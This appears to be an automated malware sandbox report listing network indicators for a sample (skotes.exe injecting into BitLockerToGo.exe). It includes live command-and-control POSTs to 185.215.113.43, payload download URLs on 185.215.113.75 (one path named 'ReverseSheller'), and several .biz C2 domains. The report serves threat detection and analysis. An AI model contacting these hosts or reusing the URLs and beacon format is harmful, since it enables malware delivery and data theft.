Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.75 185.215.113.75
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 185.215.113.75:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49943 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49997 -> 185.215.113.75:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00B9BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00B9BE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: yContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=58ffd24dbbfdfe6a906e0e3f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25663Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 11 Feb 2025 17:19:08 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlp equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: edcatiofireeu.shop
Source: global traffic DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic DNS traffic detected: DNS query: toppyneedus.biz
Source: global traffic DNS traffic detected: DNS query: lightdeerysua.biz
Source: global traffic DNS traffic detected: DNS query: suggestyuoz.biz
Source: global traffic DNS traffic detected: DNS query: hoursuhouy.biz
Source: global traffic DNS traffic detected: DNS query: mixedrecipew.biz
Source: global traffic DNS traffic detected: DNS query: affordtempyo.biz
Source: global traffic DNS traffic detected: DNS query: pleasedcfrown.biz
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$v
Source: skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0b71f45034799d2e017bfe3d1482b#
Source: skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2001
Source: skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8001
Source: skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcodedl
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded9
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3940881565.00000000017E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 00000006.00000002.3940881565.00000000017A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe
Source: skotes.exe, 00000006.00000002.3940881565.00000000017D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe23456789
Source: skotes.exe, 00000006.00000002.3940881565.00000000017A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exeS
Source: skotes.exe, 00000006.00000002.3940881565.00000000017A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exeqos.dllc
Source: skotes.exe, 00000006.00000002.3940881565.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.75/files/rast333a/random.exe
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599072689.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599072689.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599072689.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordtempyo.biz/apiw
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=aiN5PFKWybrq&a
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=xpoc7rbN
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=vybk
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: bd03a8025c.exe, 00000008.00000000.2243323865.00000000008E4000.00000002.00000001.01000000.00000009.sdmp, random[1].exe.6.dr, bd03a8025c.exe.6.dr String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictinvalid
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lightdeerysua.biz/api
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mixedrecipew.biz/api?
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pleasedcfrown.biz/apiG
